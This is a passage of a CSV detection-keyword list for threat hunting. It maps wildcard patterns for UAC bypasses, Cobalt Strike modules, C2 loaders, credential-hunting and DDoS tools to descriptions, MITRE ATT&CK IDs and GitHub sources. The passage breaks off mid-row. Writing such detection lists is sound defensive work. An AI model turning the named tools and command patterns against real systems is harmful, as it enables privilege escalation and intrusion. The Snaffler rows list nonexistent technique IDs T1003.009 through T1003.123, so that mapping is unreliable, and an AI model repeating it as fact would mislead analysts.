TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*uac sdclt *,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*uac_bypass*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*uac_easinvoker.*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! 
Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,1,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z -*UACBypass -*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*UAC-bypass*,offensive_tool_keyword,Earth Lusca Operations Tools ,Earth Lusca Operations Tools and commands,T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090,TA0007 - TA0008,N/A,N/A,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1,1,0,N/A,N/A,,N/A,,, -*uacbypass_files*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! 
Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,1,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z -*UACBypass-BOF*,offensive_tool_keyword,cobaltstrike,Beacon Object File implementation of Event Viewer deserialization UAC bypass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/TrustedPath-UACBypass-BOF,1,1,N/A,10,10,104,33,2021-08-16T07:49:55Z,2021-08-07T03:40:33Z -*UACBypassedService.exe*,offensive_tool_keyword,SCMUACBypass,SCM UAC Bypass,T1548.002 - T1088,TA0004 - TA0002,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/SCMUACBypass,1,1,N/A,8,1,57,9,2023-09-05T17:24:49Z,2023-09-04T13:11:17Z -*uacm4gic*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation 
Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*UACME-master*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*uac-schtasks *,offensive_tool_keyword,cobaltstrike,The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/ElevateKit,1,0,N/A,10,10,812,205,2020-06-22T21:12:24Z,2016-12-08T03:51:09Z -*uac-schtasks*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*uac-silentcleanup*,offensive_tool_keyword,cobaltstrike,New UAC bypass for Silent Cleanup for CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/EncodeGroup/UAC-SilentClean,1,1,N/A,10,10,173,32,2021-07-14T13:51:02Z,2020-10-07T13:25:21Z
-*uac-token-duplication*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A
-*UACTokenManipulationManager.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*uaf2john.*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z
-*uberfile --lhost* 
--lport * --target-os * --downloader *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*UCCAPI/16.0.13328.20130 OC/16.0.13426.20234*,greyware_tool_keyword,lyncsmash,default user agent used by lyncsmash.py - a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ,T1190 - T1087 - T1110,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/nyxgeek/lyncsmash,1,1,greyware_tools high risks of false positives,N/A,4,323,68,2023-05-03T19:07:11Z,2016-05-20T04:32:41Z
-*udmp-parser-main*,offensive_tool_keyword,udmp-parser,A Cross-Platform C++ parser library for Windows user minidumps.,T1005 - T1059.003 - T1027.002,TA0009 - TA0005 - TA0040,N/A,N/A,Credential Access,https://github.com/0vercl0k/udmp-parser,1,1,N/A,6,2,160,22,2023-08-27T18:30:24Z,2022-01-30T18:56:21Z
-*UDVC-Server.exe -c * -i 127.0.0.1*,offensive_tool_keyword,UniversalDVC,run an executable (UDVC-Server.exe) that sets up a communication channel for redirecting an SSF port using a DVC server. This can be seen as a form of proxy to evade detection or bypass network restrictions.,T1090,TA0005,N/A,N/A,Defense Evasion,https://github.com/earthquake/UniversalDVC,1,0,N/A,N/A,3,242,54,2020-12-07T21:02:23Z,2018-03-09T10:44:29Z
-*UFONet*,offensive_tool_keyword,UFONet,UFONet - is a free software. P2P and cryptographic -disruptive toolkit- that allows to perform DoS and DDoS attacks. 
on the Layer 7 (APP/HTTP) through the exploitation of Open Redirect vectors on third-party websites to act as a botnet and on the Layer3 (Network) abusing the protocol.,T1498 - T1499 - T1496 - T1497 - T1497,TA0040 - TA0041,N/A,N/A,DDOS,https://github.com/epsylon/ufonet,1,0,N/A,N/A,10,1920,587,2022-11-28T17:28:29Z,2013-06-18T18:11:25Z -*UFR5cGUgQW5kIFBPcHRpb25zIFRvbyBsb25nIQ==*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*UGF5bG9hZCBOYW1lLCBlLmcuIHdpbmRvd3MvbWV0ZXJwcmV0ZXIvcmV2ZXJzZV90Y3A=*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. 
Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*UGF5bG9hZCBvcHRpb25zLCBlLmcuIExIT1NUPTEuMS4xLjEsTFBPUlQ9ODg2Ng==*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*uhttpsharp.*,offensive_tool_keyword,cobaltstrike,SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. 
The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/SpiderLabs/SharpCompile,1,1,N/A,10,10,289,63,2020-08-07T12:49:36Z,2018-11-01T17:18:52Z -*uknowsec/TailorScan*,offensive_tool_keyword,cobaltstrike,Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - 
T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/uknowsec/TailorScan,1,1,N/A,10,10,269,49,2020-11-12T08:29:11Z,2020-11-09T07:38:16Z -*UlBDIFNlcnZlciBIb3N0*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*UlBDIFNlcnZlciBQb3J0*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. 
Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*Ullaakut/Gorsair*,offensive_tool_keyword,Gorsair,Gorsair hacks its way into remote docker containers that expose their APIs,T1552,TA0006,N/A,N/A,Exploitation tools,https://github.com/Ullaakut/Gorsair,1,1,N/A,N/A,9,825,74,2023-09-09T13:18:33Z,2018-08-02T16:49:14Z -*UltraSnaffCore.csproj*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - 
T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*UltraSnaffler.sln*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - 
T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*UltraSnaffler.sln*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1595 - T1592 - T1589 - T1590 - T1591,TA0043,N/A,N/A,Reconnaissance,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*UMJjAiNUUtvNww0lBj9tzWegwphuIn6hNP9eeIDfOrcHJ3nozYFPT-Jl7WsmbmjZnQXUesoJkcJkpdYEdqgQFE6QZgjWVsLSSDonL28DYDVJ*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
